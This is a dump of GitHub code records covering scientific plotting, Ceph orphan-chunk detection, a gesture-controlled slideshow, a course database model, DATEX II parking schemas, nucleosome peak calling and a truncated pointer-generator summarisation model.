moments_file[:,12]\n C5 = moments_file[:,13]\n\n # fields = [M0]#, C0, M1, C1, M2, C2, M3, C3, M4, C4, M5, C5]\n # for j in range(len(fields)):\n # fields[j] = smoothing(, k, Lambda, kind)\n # # print(field)\n\n # from scipy.interpolate import interp1d\n # initial_file = np.genfromtxt(path + 'output_initial.txt')\n # q = initial_file[:,0]\n # Psi = initial_file[:,1]\n #\n # nbody_file = np.genfromtxt(path + 'output_{0:04d}.txt'.format(j))\n # x_in = nbody_file[:,-1]\n #\n # Nx = x_in.size\n # L = np.max(x_in)\n # k = np.fft.ifftshift(2.0 * np.pi / L * np.arange(-Nx/2, Nx/2))\n # dc_in_Psi = -spectral_calc(Psi, L, o=1, d=0) / a0\n # dc_SPT_Psi = SPT_real_tr(smoothing(dc_in_Psi, k, Lambda, kind='gaussian'), k, L, Lambda=1, a=a, kind='gaussian')\n # x_in = np.sort(x_in)\n #\n # k_nb= np.fft.ifftshift(2.0 * np.pi * np.arange(-x.size/2, x.size/2))\n # M0 = smoothing(M0, k_nb, Lambda, kind='gaussian')\n\n # A = [-0.05, 1, -0.5, 11]\n # dc_in = initial_density(x, A, L)\n # Nx = x.size\n # k = 
np.fft.ifftshift(2.0 * np.pi / L * np.arange(-Nx/2, Nx/2))\n # dc_SPT = SPT_real_tr(dc_in, k, L, Lambda=1, a=a, kind='gaussian')\n\n # f_dc = interp1d(q, dc_SPT_Psi, kind='cubic', fill_value='extrapolate')\n # dc_SPT_Psi = f_dc(x)\n\n # dk_par, a, dx = read_density(path, j)\n # L = 1.0\n # x_grid = np.arange(0, L, dx)\n #\n # M0_par = np.real(np.fft.ifft(dk_par))\n # M0_par /= np.mean(M0_par)\n # f_M0 = interp1d(x_grid, M0_par, fill_value='extrapolate')\n # M0_par = f_M0(x)\n # M0_k = np.fft.fft(M0_par - 1) / M0_par.size\n # P_nb = np.real(M0_k * np.conj(M0_k))\n # k = np.fft.ifftshift(2.0 * np.pi / L * np.arange(-P_nb.size/2, P_nb.size/2)) / (2*np.pi)\n # C1 = v_nbody\n moments = ['M0', 'C0', 'M1', 'M2', 'C1', 'C2', 'M3', 'C3', 'M4', 'C4', 'M5', 'C5']#, 'M1', 'C1', 'M2', 'C1', 'C2']\n # moments = ['C2']\n g = 500\n i1, i2 = 0, -1 #250000-g, 250000+g\n\n for MorC, nM in moments:\n ylabel = r\"$\\mathrm{{{MorC}}}^{{({nM})}}$\".format(MorC=MorC, nM=nM)\n\n nbody_m = '{}{}'.format(MorC, nM)\n\n fig, ax = plt.subplots()\n ax.set_title(r'$a = {}$'.format(a))\n ax.set_xlabel(r'$x\\;[h^{-1}\\;\\mathrm{Mpc}]$', fontsize=14)\n # ax.set_xlabel(r'$k\\;[2\\pi h\\;\\mathrm{Mpc}^{-1}]$', fontsize=14)\n # ax.set_ylabel(r'$P(k)$', fontsize=14)\n\n ax.set_ylabel(ylabel, fontsize=14)\n\n # ax.scatter(k, P_nb, c='k', s=20, label=r'$N-$body')\n # ax.plot(x, dc_in, c='b', lw=2, label=r'analytical')\n # ax.plot(x, dc_in_Psi, c='r', ls='dashdot', lw=2, label=r'numerical')\n\n ax.plot(x[i1:i2], locals()[nbody_m][i1:i2], c='k', lw=2)#, label='hierarchy')\n\n\n # ax.plot(x_nbody[i1:i2], v_nbody[i1:i2], c='k', lw=2, label='hierarchy')\n\n # ax.plot(x_in, dc_SPT_Psi, c='r', ls='dashdot', lw=2, label='SPT')\n # ax.plot(x, dc_SPT, c='b', ls='dashed', lw=2, label='SPT an')\n # ax.set_xlim(0, 10)\n # plt.legend()\n ax.tick_params(axis='both', which='both', direction='in')\n ax.ticklabel_format(scilimits=(-2, 3))\n ax.grid(lw=0.2, ls='dashed', color='grey')\n ax.yaxis.set_ticks_position('both')\n ax.minorticks_on()\n\n # plt.savefig('../plots/nbody_gauss_run/{}{}/{}{}_{}.png'.format(MorC, nM, MorC, nM, j), bbox_inches='tight', dpi=120)\n # plt.savefig('../plots/nbody_gauss_run/PS_{}.png'.format(j), bbox_inches='tight', dpi=120)\n\n # plt.savefig('../plots/new_sim_k_1_11/sm/{}/{}_{}.png'.format(nbody_m, nbody_m, j), bbox_inches='tight', dpi=150)\n # plt.close()\n plt.show()\n","repo_name":"mandarmk9/eft_code","sub_path":"cosmo_sim_an.py","file_name":"cosmo_sim_an.py","file_ext":"py","file_size_in_byte":6250,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
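The script above smooths every moment field with smoothing(field, k, Lambda, kind='sharp') from the repo's functions module, whose body is not shown. A guess at what a sharp-cutoff filter does, for readers without that module:

```python
import numpy as np

def sharp_k_smooth(field, L, Lambda):
    """Zero all Fourier modes with |k| > Lambda (sharp low-pass cutoff)."""
    n = field.size
    k = 2 * np.pi * np.fft.fftfreq(n, d=L / n)  # angular wavenumbers
    fk = np.fft.fft(field)
    fk[np.abs(k) > Lambda] = 0.0
    return np.real(np.fft.ifft(fk))
```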
+{"seq_id":"42626121170","text":"#!/usr/bin/env python\n\n'''\nThis programme searches a dump file to find any chunks without a first chunk. It then saves the names of these chunks to a seperate file to be deleted later. It sorts the file containing all the files in as it is quicker than running over the file multiple times\n'''\n\nimport gzip, sys\n\ninput = sys.argv[1]\noutput = sys.argv[2]\n\nfin = gzip.open(input, \"r\")\norphans = open(output, \"w\")\nsortedfile = sorted(fin)\nfirstfile = sortedfile[0]\npreviousFile = firstfile[0:-18]\nffend = firstfile[-16:]\nstrippedffend = ffend.strip()\nif strippedffend != \"0000000000000000\":\n lastOrphan = firstfile[0:-18]\nelse:\n lastOrphan = \"a\"\n\nfor line in sortedfile:\n strippedline = line.strip()\n end = strippedline[-16:]\n currentFile = line[0:-18]\n if currentFile == previousFile or end == \"0000000000000000\":\n if currentFile != lastOrphan:\n previousFile = currentFile\n continue\n orphans.write(line)\n previousFile = currentFile\n lastOrphan = currentFile\n","repo_name":"stfc/ral-ceph-tools","sub_path":"dataconsistency/orphanfiles.py","file_name":"orphanfiles.py","file_ext":"py","file_size_in_byte":1012,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"70"}
+{"seq_id":"27462852174","text":"BUTTONS = {\n 'A': 4, # L1\n 'B': 5, # R1\n 'C': 0, # A\n 'D': 1, # B\n 'E': 2, # X\n 'F': 3, # Y\n 'G': 6, # Left middle\n 'H': 7, # right middle\n 'I': 8, # Xbox\n 'J': 9, # L3\n 'K': 10, # R3\n}\n\nAXES = {\n 'LX': 0, # Horizontal Left\n 'LY': 1, # Vertical Left\n 'RX': 3, # Horizontal Right\n 'RY': 4, # Vertical Right\n 'LT': 2, # Trigger Left\n 'RT': 5, # Trigger Right\n}\n","repo_name":"gpatsiaouras/doratello","sub_path":"src/controllers/xbox_one.py","file_name":"xbox_one.py","file_ext":"py","file_size_in_byte":427,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"70"}
+{"seq_id":"3504057671","text":"import pandas as pd\nimport ast\nimport numpy as np\n\n\ndef extract_data(csv_file):\n data = pd.read_csv(csv_file)\n cols_needed = [\"trip_number\", \"so_number\", \"vehicle_plate_no\"]\n dropoffs = data[\"dropoffs\"]\n pickups = data[\"pickups\"]\n\n data = data[data.columns.intersection(cols_needed)]\n\n dropoff_name = []\n dropoff_arrival = []\n pickup_name = []\n pickup_arrival = []\n\n for dropoff in dropoffs:\n dropoff_dict = ast.literal_eval(dropoff)\n for value in dropoff_dict:\n dropoff_name.append(value.get(\"name\", \"No name\"))\n dropoff_arrival.append(value.get(\"arrival\", \"No arrival\"))\n\n for pickup in pickups:\n pickup_dict = ast.literal_eval(pickup)\n for value in pickup_dict:\n pickup_name.append(value.get(\"name\", \"No name\"))\n pickup_arrival.append(value.get(\"arrival\", \"No arrival\"))\n\n data[\"dropoff_name\"] = np.array(dropoff_name)\n data[\"dropoff_arrival\"] = pd.to_datetime(np.array(dropoff_arrival))\n data[\"pickup_name\"] = np.array(pickup_name)\n data[\"pickup_arrival\"] = pd.to_datetime(np.array(pickup_arrival))\n\n data[\"dropoff_arrival\"] += pd.DateOffset(hours=8)\n data[\"pickup_arrival\"] += pd.DateOffset(hours=8)\n return data\n\n\ntrans = extract_data(\"Transpecial-FO-Jan2021.csv\")\ntrans.to_csv(\"Transpecial-FO-Jan2021-extracted.csv\")\n\nehd = extract_data(\"EHD_Logistics-FO-Jan2021.csv\")\nehd.to_csv(\"EHD_Logistics-FO-Jan2021-extracted.csv\")\n\npan = extract_data(\"Pan_Logistics-FO-Jan2021.csv\")\npan.to_csv(\"Pan_Logistics-FO-Jan2021-extracted.csv\")\n","repo_name":"idellang/Work-And-Projects","sub_path":"WTI/CICO Matching Algo/data_fo/extracting_fo.py","file_name":"extracting_fo.py","file_ext":"py","file_size_in_byte":1560,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"70"}
+{"seq_id":"39491781590","text":"#In This project we can use pinkeyfinger change pages to right and thumb changes pages in left direction\r\nimport cv2\r\nfrom cvzone.HandTrackingModule import HandDetector\r\n\r\ndetector = HandDetector(maxHands=1, detectionCon=0.8)\r\nimport os\r\n\r\nheight, width = 1200, 700\r\ncap = cv2.VideoCapture(0)\r\ncap.set(3, width)\r\ncap.set(4, height)\r\nhs, ws = int(200), int(200)\r\nimgnumber = 0\r\nfolderpath = \"images\"\r\npathimages = sorted(os.listdir(folderpath), key=len)\r\nthresold = 300\r\nbuttonpressed = False\r\nbuttoncounter = 0\r\nbuttondelay = 30\r\n\r\nwhile True:\r\n ret, img = cap.read()\r\n img = cv2.flip(img, 1)\r\n pathfullimages = os.path.join(folderpath, pathimages[imgnumber])\r\n imagecurrunt = cv2.imread(pathfullimages)\r\n imgsmall = cv2.resize(img, (ws, hs))\r\n h, w, _ = imagecurrunt.shape\r\n imagecurrunt[0:hs, w - ws:w] = imgsmall\r\n hands, img = detector.findHands(img)\r\n cv2.line(img, (0, thresold), (width, thresold), (0, 255, 0), 3)\r\n\r\n if hands and buttonpressed is False:\r\n hand = hands[0]\r\n finger = detector.fingersUp(hand)\r\n\r\n cx, cy = hand['center']\r\n lmList = hand['lmList']\r\n indexFinger=lmList[8][0],lmList[8][1]\r\n\r\n if cy <= thresold:\r\n\r\n if finger == [1, 0, 0, 0, 0]:\r\n\r\n print(\"left\")\r\n if imgnumber > 0:\r\n buttonpressed = True\r\n imgnumber -= 1\r\n if finger == [0, 0, 0, 0, 1]:\r\n\r\n print(\"Right\")\r\n if imgnumber < len(pathimages) - 1:\r\n buttonpressed = True\r\n imgnumber += 1\r\n if finger == [0, 1, 1, 0, 1]:\r\n cv2.circle(imagecurrunt,indexFinger,20,(255,0,0),cv2.FILLED)\r\n\r\n if buttonpressed:\r\n buttoncounter += 1\r\n if buttoncounter > buttondelay:\r\n buttoncounter = 0\r\n buttonpressed = False\r\n\r\n cv2.imshow(\"img1\", imagecurrunt)\r\n cv2.imshow(\"img\", img)\r\n\r\n key = cv2.waitKey(1)\r\n if key == 27:\r\n break\r\ncap.release()\r\ncv2.destroyWindow()","repo_name":"khushbuchuahan3/Hand_Control_Presentation","sub_path":"Hand_control_presentation.py","file_name":"Hand_control_presentation.py","file_ext":"py","file_size_in_byte":2042,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"20995842000","text":"from sqlalchemy import Column, String, Integer, ForeignKey, Text, Boolean\nfrom marshmallow import fields\n\nimport models\nfrom models.generics.models import db, ma\nfrom models.generics.base import Base\nfrom common.dates import datetime_to_string, string_to_datetime\nfrom models.generics.resources import WithUrl, WithVersion, WithVisibility\n\n\nclass CourseSettingsSchema(ma.Schema):\n enforce_dates = fields.Boolean(default=False)\n\n\nclass Course(Base, WithUrl, WithVersion, WithVisibility):\n SERVICES = ['native', 'lti']\n VISIBILITIES = ['private', 'public', 'students', 'teacher']\n LOG_LEVELS = ['nothing', 'everything', 'errors']\n\n name = Column(String(255))\n description = Column(Text())\n owner_id = Column(Integer(), ForeignKey('user.id'))\n service = Column(String(80), default=\"native\")\n external_id = Column(String(255), default=\"\")\n endpoint = Column(Text(), default=\"\")\n visibility = Column(String(80), default=\"private\")\n is_default = Column(Boolean(), default=False)\n term = Column(String(255), default=\"\")\n settings = Column(Text(), default=\"\")\n\n owner = db.relationship(\"User\")\n\n def encode_json(self):\n user = models.User.query.get(self.owner_id)\n return {'_schema_version': 3,\n 'name': self.name,\n 'url': self.url,\n 'owner_id': self.owner_id,\n 'owner_id__email': user.email if user else '',\n 'service': self.service,\n 'external_id': self.external_id,\n 'endpoint': self.endpoint,\n 'visibility': self.visibility,\n 'settings': self.settings,\n 'term': self.term,\n 'id': self.id,\n 'date_modified': datetime_to_string(self.date_modified),\n 'date_created': datetime_to_string(self.date_created)}\n\n SCHEMA_V1_IGNORE_COLUMNS = Base.SCHEMA_V1_IGNORE_COLUMNS + ('owner_id__email',)\n SCHEMA_V2_IGNORE_COLUMNS = Base.SCHEMA_V2_IGNORE_COLUMNS + ('owner_id__email',)\n SCHEMA_V3_IGNORE_COLUMNS = SCHEMA_V2_IGNORE_COLUMNS\n\n\n @staticmethod\n def export(course_id):\n course = Course.query.get(course_id)\n # Get all course's assignments\n course_assignments = models.Assignment.by_course(course_id, False)\n # Get all course's assignment groups\n groups = course.get_assignment_groups()\n assignment_groups = [a.encode_json() for a in groups]\n\n # Get all assignment groups' memberships\n assignment_memberships = [a.encode_json()\n for a in models.AssignmentGroupMembership.by_course(course_id)]\n # Get all assignment groups' assignments\n groups_assignments = {a for g in groups\n for a in g.get_assignments()}\n groups_assignments.update(course_assignments)\n assignments = [a.encode_json() for a in groups_assignments]\n assignments.sort(key=lambda a: a['name'])\n return {\n 'course': course.encode_json(),\n 'assignments': assignments,\n 'assignment_groups': assignment_groups,\n 'assignment_memberships': assignment_memberships\n }\n\n def __str__(self):\n return ''.format(self.id)\n\n @staticmethod\n def get_public():\n return Course.query.filter_by(visibility='public').all()\n\n @staticmethod\n def remove(course_id, remove_linked=False):\n Course.query.filter_by(id=course_id).delete()\n if remove_linked:\n for m in models.AssignmentGroupMembership.by_course(course_id):\n db.session.delete(m)\n for a in models.Assignment.by_course(course_id):\n for s in a.sample_submissions():\n db.session.delete(s)\n db.session.delete(a)\n for g in models.AssignmentGroup.by_course(course_id):\n db.session.delete(g)\n for r in models.Role.by_course(course_id):\n db.session.delete(r)\n db.session.commit()\n\n def get_users(self):\n return 
(db.session.query(models.Role, models.User)\n .filter(models.Role.course_id == self.id)\n .filter(models.Role.user_id == models.User.id).all())\n\n def get_students(self):\n return [x[1] for x in (db.session.query(models.Role, models.User)\n .filter(models.Role.course_id == self.id)\n .filter(models.Role.user_id == models.User.id).distinct())]\n\n def get_assignments(self):\n return (db.session.query(models.Assignment, models.AssignmentGroupMembership)\n .filter(models.Assignment.course_id == self.id,\n models.AssignmentGroupMembership.assignment_id == models.Assignment.id)\n .all())\n\n def get_submitted_assignments(self):\n return (db.session.query(models.Assignment)\n .join(models.Submission, models.Submission.assignment_id == models.Assignment.id)\n .filter(models.Submission.course_id == self.id)\n .distinct())\n\n def get_submissions(self):\n return (db.session.query(models.Submission)\n .filter(models.Submission.course_id == self.id)\n .all())\n\n def get_assignment_groups(self):\n return (db.session.query(models.AssignmentGroup)\n .filter(models.AssignmentGroup.course_id == self.id)\n .order_by(models.AssignmentGroup.name)\n .all())\n\n def update_endpoint(self, endpoint):\n self.endpoint = endpoint\n db.session.commit()\n\n @staticmethod\n def get_all_groups(menu='embed'):\n courses = Course.query.all()\n return [{'id': course.id,\n 'name': course.name,\n 'groups': [{'id': group.id,\n 'name': group.name,\n 'select_url': group.get_select_url(menu)}\n for group in models.AssignmentGroup.by_course(course.id)]\n }\n for course in courses]\n\n @staticmethod\n def rename(course_id, name=None):\n course = Course.by_id(course_id)\n if name is not None:\n course.name = name\n db.session.commit()\n return course\n\n @staticmethod\n def new(name, owner_id, visibility):\n if visibility == 'public':\n visibility = 'public'\n else:\n visibility = 'private'\n new_course = Course(name=name, owner_id=owner_id, visibility=visibility)\n db.session.add(new_course)\n db.session.flush()\n new_role = models.Role(name='instructor', user_id=owner_id, course_id=new_course.id)\n db.session.add(new_role)\n db.session.commit()\n return new_course\n\n @staticmethod\n def new_lti_course(service, external_id, name, user_id, endpoint=\"\"):\n new_course = Course(name=name, owner_id=user_id,\n service=service, external_id=external_id,\n endpoint=endpoint)\n db.session.add(new_course)\n db.session.commit()\n return new_course\n\n @staticmethod\n def by_url(course_url):\n return Course.query.filter_by(url=course_url).first()\n\n @staticmethod\n def from_lti(service, lti_context_id, name, user_id, endpoint=\"\"):\n lti_course = Course.query.filter_by(external_id=lti_context_id).first()\n if lti_course is None:\n return Course.new_lti_course(service=service,\n external_id=lti_context_id,\n name=name,\n user_id=user_id,\n endpoint=endpoint)\n else:\n return lti_course\n\n def grading_grid(self):\n # Return a list of lists of assignments/students/submissions\n assignments = []\n submissions = []\n return assignments, submissions\n\n\nclass CourseSchema(ma.SQLAlchemyAutoSchema):\n class Meta:\n model = Course\n include_fk = True\n\n\n","repo_name":"blockpy-edu/blockpy-server-v2","sub_path":"models/course.py","file_name":"course.py","file_ext":"py","file_size_in_byte":8117,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"70"}
+{"seq_id":"43190456182","text":"from dataclasses import dataclass, field\nfrom typing import List, Optional\nfrom datexii.models.eu.datexii.v2.accessibility_enum import AccessibilityEnum\nfrom datexii.models.eu.datexii.v2.dedicated_access import DedicatedAccess\nfrom datexii.models.eu.datexii.v2.extension_type import ExtensionType\nfrom datexii.models.eu.datexii.v2.multilingual_string import MultilingualString\nfrom datexii.models.eu.datexii.v2.occupancy_detection_type_enum import OccupancyDetectionTypeEnum\nfrom datexii.models.eu.datexii.v2.parking_assignment import ParkingAssignment\nfrom datexii.models.eu.datexii.v2.parking_mode_enum import ParkingModeEnum\nfrom datexii.models.eu.datexii.v2.parking_security_enum import ParkingSecurityEnum\nfrom datexii.models.eu.datexii.v2.parking_space_accessibility_enum import ParkingSpaceAccessibilityEnum\nfrom datexii.models.eu.datexii.v2.parking_space_basics_equipment_or_service_facility_index_parking_equipment_or_service_facility import ParkingSpaceBasicsEquipmentOrServiceFacilityIndexParkingEquipmentOrServiceFacility\nfrom datexii.models.eu.datexii.v2.parking_space_basics_scenario_index_parking_usage_scenario import ParkingSpaceBasicsScenarioIndexParkingUsageScenario\nfrom datexii.models.eu.datexii.v2.parking_space_physics_enum import ParkingSpacePhysicsEnum\nfrom datexii.models.eu.datexii.v2.reservation_type_enum import ReservationTypeEnum\n\n__NAMESPACE__ = \"http://datex2.eu/schema/2/2_0\"\n\n\n@dataclass\nclass ParkingSpaceBasics:\n \"\"\"\n Common properties of parking spaces and groups of parking spaces.\n\n :ivar parking_space_or_group_identifier: A public identifier or\n short description for the parking space or group of parking\n spaces, for example \"6D\" or \"Truck parking west\".\n :ivar parking_floor_or_level: The floor or level of the parking site\n on which the assigned parking spaces are located.\n :ivar accessibility: Information on accessibility, easements and\n marking for handicapped people.\n :ivar parking_space_accessibility: Further easements for handicapped\n people related to this parking space or this group of parking\n spaces.\n :ivar parking_space_physics: Specifies 'driveThrough' or 'openAir'\n for the parking space or the group of parking spaces.\n :ivar parking_mode: The arrangement of the parking space or the\n group of parking spaces in relation to the road.\n :ivar parking_reservation: Indication of whether a parking\n reservation service is available and/or mandatory.\n :ivar maximum_parking_duration: The maximum parking duration for a\n parking record, a parking space or a group of parking spaces\n (e.g. to avoid overnight parking).\n :ivar distance_from_primary_road: Specifies the distance from the\n primary road in metres. Especially useful, if parking is located\n on a smaller type of road.\n :ivar parking_occupany_detection_type: Type of parking occupancy\n detection for a parking record, a parking space or a group of\n parking spaces, if any (balancing, single slot, ... ).\n :ivar parking_security: Specifies security measures related to the\n parking site or particular spaces.\n :ivar dedicated_access:\n :ivar only_assigned_parking: Parking is only allowed for the\n assignment given in this class, i.e. other assignments are not\n allowed. By using this role, it is not allowed to use\n 'assignedParkingAmongOthers' and 'prohibitedParking' for the\n same type of attributes.\n :ivar assigned_parking_among_others: Assignments for parking. Other\n assignments are allowed as well, i.e. 
the parking spaces are\n convenient for this kind of assignment.\n :ivar prohibited_parking: Parking is not allowed for the given\n assignment.\n :ivar parking_equipment_or_service_facility: Equipment, services and\n scenarios, which are directly related to the assigned parking\n space or parking space group. Note that the infrastructure index\n must be unique with respect to the Parking class' infrastructure\n indices\n :ivar parking_usage_scenario:\n :ivar parking_space_basics_extension:\n \"\"\"\n parking_space_or_group_identifier: Optional[MultilingualString] = field(\n default=None,\n metadata={\n \"name\": \"parkingSpaceOrGroupIdentifier\",\n \"type\": \"Element\",\n \"namespace\": \"http://datex2.eu/schema/2/2_0\",\n }\n )\n parking_floor_or_level: Optional[int] = field(\n default=None,\n metadata={\n \"name\": \"parkingFloorOrLevel\",\n \"type\": \"Element\",\n \"namespace\": \"http://datex2.eu/schema/2/2_0\",\n }\n )\n accessibility: List[AccessibilityEnum] = field(\n default_factory=list,\n metadata={\n \"type\": \"Element\",\n \"namespace\": \"http://datex2.eu/schema/2/2_0\",\n }\n )\n parking_space_accessibility: List[ParkingSpaceAccessibilityEnum] = field(\n default_factory=list,\n metadata={\n \"name\": \"parkingSpaceAccessibility\",\n \"type\": \"Element\",\n \"namespace\": \"http://datex2.eu/schema/2/2_0\",\n }\n )\n parking_space_physics: List[ParkingSpacePhysicsEnum] = field(\n default_factory=list,\n metadata={\n \"name\": \"parkingSpacePhysics\",\n \"type\": \"Element\",\n \"namespace\": \"http://datex2.eu/schema/2/2_0\",\n \"max_occurs\": 2,\n }\n )\n parking_mode: Optional[ParkingModeEnum] = field(\n default=None,\n metadata={\n \"name\": \"parkingMode\",\n \"type\": \"Element\",\n \"namespace\": \"http://datex2.eu/schema/2/2_0\",\n }\n )\n parking_reservation: Optional[ReservationTypeEnum] = field(\n default=None,\n metadata={\n \"name\": \"parkingReservation\",\n \"type\": \"Element\",\n \"namespace\": \"http://datex2.eu/schema/2/2_0\",\n }\n )\n maximum_parking_duration: Optional[float] = field(\n default=None,\n metadata={\n \"name\": \"maximumParkingDuration\",\n \"type\": \"Element\",\n \"namespace\": \"http://datex2.eu/schema/2/2_0\",\n }\n )\n distance_from_primary_road: Optional[int] = field(\n default=None,\n metadata={\n \"name\": \"distanceFromPrimaryRoad\",\n \"type\": \"Element\",\n \"namespace\": \"http://datex2.eu/schema/2/2_0\",\n }\n )\n parking_occupany_detection_type: List[OccupancyDetectionTypeEnum] = field(\n default_factory=list,\n metadata={\n \"name\": \"parkingOccupanyDetectionType\",\n \"type\": \"Element\",\n \"namespace\": \"http://datex2.eu/schema/2/2_0\",\n }\n )\n parking_security: List[ParkingSecurityEnum] = field(\n default_factory=list,\n metadata={\n \"name\": \"parkingSecurity\",\n \"type\": \"Element\",\n \"namespace\": \"http://datex2.eu/schema/2/2_0\",\n }\n )\n dedicated_access: List[DedicatedAccess] = field(\n default_factory=list,\n metadata={\n \"name\": \"dedicatedAccess\",\n \"type\": \"Element\",\n \"namespace\": \"http://datex2.eu/schema/2/2_0\",\n }\n )\n only_assigned_parking: Optional[ParkingAssignment] = field(\n default=None,\n metadata={\n \"name\": \"onlyAssignedParking\",\n \"type\": \"Element\",\n \"namespace\": \"http://datex2.eu/schema/2/2_0\",\n }\n )\n assigned_parking_among_others: Optional[ParkingAssignment] = field(\n default=None,\n metadata={\n \"name\": \"assignedParkingAmongOthers\",\n \"type\": \"Element\",\n \"namespace\": \"http://datex2.eu/schema/2/2_0\",\n }\n )\n prohibited_parking: 
Optional[ParkingAssignment] = field(\n default=None,\n metadata={\n \"name\": \"prohibitedParking\",\n \"type\": \"Element\",\n \"namespace\": \"http://datex2.eu/schema/2/2_0\",\n }\n )\n parking_equipment_or_service_facility: List[ParkingSpaceBasicsEquipmentOrServiceFacilityIndexParkingEquipmentOrServiceFacility] = field(\n default_factory=list,\n metadata={\n \"name\": \"parkingEquipmentOrServiceFacility\",\n \"type\": \"Element\",\n \"namespace\": \"http://datex2.eu/schema/2/2_0\",\n }\n )\n parking_usage_scenario: List[ParkingSpaceBasicsScenarioIndexParkingUsageScenario] = field(\n default_factory=list,\n metadata={\n \"name\": \"parkingUsageScenario\",\n \"type\": \"Element\",\n \"namespace\": \"http://datex2.eu/schema/2/2_0\",\n }\n )\n parking_space_basics_extension: Optional[ExtensionType] = field(\n default=None,\n metadata={\n \"name\": \"parkingSpaceBasicsExtension\",\n \"type\": \"Element\",\n \"namespace\": \"http://datex2.eu/schema/2/2_0\",\n }\n )\n","repo_name":"tefra/xsdata-samples","sub_path":"datexii/models/eu/datexii/v2/parking_space_basics.py","file_name":"parking_space_basics.py","file_ext":"py","file_size_in_byte":8907,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"70"}
+{"seq_id":"19679759347","text":"from __future__ import print_function, division\nimport sys, os\nimport numpy as np\nimport pbcore.io as pb\nfrom Bio import Seq, SeqIO\nfrom tqdm import tqdm\nfrom scipy.signal import find_peaks\nimport pandas as pd\n\ndef callNucPeaks(npyf, refFile, sampname, heightcutoff=-10, windowsize=133):\n tipdms = np.load(npyf)\n \n for ir, record in enumerate(SeqIO.parse(refFile, 'fasta')):\n if ir > 0:\n raise InputError('Reference sequence has multiple entries')\n refseq = record.seq\n\n window = windowsize\n windowhalf = int((window-1)/2)\n #windmids = range(windowhalf, len(refseq)-windowhalf)\n\n peakdic = {'zmw':[], 'pos':[], 'height':[], 'prominence':[]}\n for izm in range(tipdms.shape[0]):\n rollingT = [np.nanmean(tipdms[izm, max(x-windowhalf,0):min(x+windowhalf+1,len(refseq))]) for x in range(0,len(refseq))]\n rollingT = np.asarray(rollingT)\n peaks, peakinf = find_peaks(-1 * rollingT, distance=147, height=heightcutoff, prominence=0.01)\n for ip, p in enumerate(peaks):\n peakdic['zmw'].append(izm)\n peakdic['pos'].append(peaks[ip])\n peakdic['height'].append(peakinf['peak_heights'][ip])\n peakdic['prominence'].append(peakinf['prominences'][ip])\n \n peakdf = pd.DataFrame(peakdic)\n peakdf.to_feather(sampname + '_peaks.feather')\n\n\ndef main():\n usenamepath = sys.argv[3] + '_' + sys.argv[4]\n print(usenamepath)\n heightparam = float(sys.argv[5]) if len(sys.argv) > 5 else -10\n windowparam = int(sys.argv[6]) if len(sys.argv) > 6 else 133\n callNucPeaks(sys.argv[1], sys.argv[2], usenamepath, heightparam)\n \n \nif __name__ == \"__main__\":\n # Usage: ./callNucPeaks.py [onlyTipd.npy] [reference.fasta] [cell] [sampleName]\n main()\n","repo_name":"RamaniLab/SAMOSA","sub_path":"callNucPeaks.py","file_name":"callNucPeaks.py","file_ext":"py","file_size_in_byte":1774,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"70"}
+{"seq_id":"42479629147","text":"# -*- coding:utf-8 -*-\n# Created by Chen Qianqian\n\nimport tensorflow as tf\nfrom model_layers.layers import Encoder,BahdanauAttention,Decoder,Pointer\nfrom utils.params import get_params\nfrom utils.data_loader import load_embedding_matrix,Vocab\nimport random\n\n\n\nclass PGN(tf.keras.Model):\n def __init__(self,params,embedding_matrix,vocab):\n super(PGN, self).__init__()\n self.encoder = Encoder(params, embedding_matrix)\n self.attention = BahdanauAttention(params)\n self.decoder = Decoder(params, embedding_matrix)\n self.pointer = Pointer()\n self.batch_size = params['batch_size']\n self.max_enc_len = params['max_enc_len']\n self.use_scheduled_sampling = params['use_scheduled_sampling']\n self.vocab_size = params['vocab_size']\n self.mode = params['mode']\n self.vocab=vocab\n\n\n def call_encoder(self,inp):\n init_state = self.encoder.initial_state()\n output,state = self.encoder(inp,init_state)\n return output, state\n\n def call_decoder(self,dec_input,enc_output, dec_hidden, enc_pad_mask,prev_coverage,max_oov_len,extended_enc_inp):\n context_vector, attention_weight, prev_coverage = self.attention(enc_output, dec_hidden, enc_pad_mask,prev_coverage)\n prediction, dec_hidden = self.decoder(dec_input, dec_hidden, context_vector)\n print(prediction)\n p_gen = self.pointer(context_vector, dec_hidden, dec_input)\n final_dists = self.calc_final_dist(prediction, attention_weight, p_gen, max_oov_len, extended_enc_inp)\n final_dists = tf.stack(final_dists, 1)\n return final_dists\n\n\n def call(self,enc_output,dec_hidden,enc_pad_mask,dec_target,batch_oov_len,extended_enc_inp):\n predictions = []\n attentions = []\n p_gens = []\n coverages = [tf.zeros((self.batch_size, self.max_enc_len, 1))] # C0 = 0\n\n context_vector,attention_weights,coverage=self.attention(enc_output,dec_hidden,enc_pad_mask,prev_coverage=None)\n coverages.append(coverage)\n attentions.append(attention_weights)\n\n dec_input = tf.expand_dims([self.vocab.word2id['']] * self.batch_size, axis=1)\n\n for t in range(dec_target.shape[1]): # dec_input with and tokens, without \n prediction, dec_hidden = self.decoder(dec_input,dec_hidden,context_vector)\n p_gen = self.pointer(context_vector, dec_hidden, dec_input)\n\n predictions.append(prediction)\n p_gens.append(p_gen)\n\n context_vector, attention_weights, coverage=self.attention(enc_output,dec_hidden,enc_pad_mask,prev_coverage=coverage)\n coverages.append(coverage)\n attentions.append(attention_weights)\n\n\n if self.use_scheduled_sampling:\n cur_samp = random.uniform(0, 1)\n threshhold = tf.pow(0.95, t) # schedule_type: \"exponential\"\n if cur_samp < threshhold:\n dec_input = tf.expand_dims(dec_target[:, t], axis=1)\n else:\n dec_input = tf.expand_dims(prediction, axis=1)\n else:\n dec_input = tf.expand_dims(dec_target[:, t],axis=1) # Teacher forcing - feeding the target as the next input\n\n final_dists = self.calc_final_dist(predictions, attentions, p_gens, batch_oov_len, extended_enc_inp)\n\n\n if self.mode == 'train':\n return tf.stack(final_dists,axis=1), dec_hidden, attentions, coverages\n else:\n return 